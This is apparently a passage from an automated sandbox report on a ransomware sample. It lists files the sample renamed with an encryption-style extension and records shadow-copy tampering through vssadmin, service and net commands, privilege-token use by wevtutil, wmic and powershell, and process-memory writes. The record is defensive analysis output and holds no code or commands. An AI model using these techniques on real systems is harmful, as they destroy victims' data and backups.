File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_SGT8URzAQBA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_497_upyDxr80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_yzv7fGQeusc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.ELM.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nJFdfIuywj40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_sxbAxYEGbIk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_gh7HKWwFaCc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00687_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_7nYtHetx2wE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR39F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_8cOWmM0P3fE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_v-Dji1ArOpY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_6TOpSANo4tQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00391_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_qxjzNKqX7eM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ggDLiAovPcM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_IGgRsQMT1b40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_s4ScfK4JFks0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\UnlockClose.wdp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_K-QvJQ8ZjFM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_A3dzxAxRhvc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_48.jpg C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mwdAM9IcPIA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Services\verisign.bmp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nwBcysLdQJo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ldJSXuI5Szc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_C5Mmz3yuyNY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-2pyxKznThM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_wU5YPL8KIgU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\setup_wm.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_uwsrTcepxOs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_m45q3VgObc80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_3roULLG0Q-o0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_Liwi_NnikTc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwresmlm.dat C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_fIVVazX-qVc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_hWR8tHXnklg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_vw1BQm7TVVA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\en.ttt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_xhxn1-Xw-8k0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\th.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_okdJzt01E140.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ro.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_QSxGsNbzmGs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GEJMpGZaN-00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_NwJQOh75ixA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_DijtvB6KpR80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ORU5jAhnJRQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GPy6rxBomDk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-wMe8YHV2fM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1928 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1984 wrote to memory of 524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 472 wrote to memory of 1416 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 472 wrote to memory of 1416 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 472 wrote to memory of 1416 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1464 wrote to memory of 1396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 1396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 1396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 540 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 540 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 540 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1508 wrote to memory of 620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1508 wrote to memory of 620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1508 wrote to memory of 620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 2028 wrote to memory of 2044 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 2044 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 2044 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1048 wrote to memory of 1968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1048 wrote to memory of 1968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1048 wrote to memory of 1968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1084 wrote to memory of 736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1084 wrote to memory of 736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1084 wrote to memory of 736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe

Processes

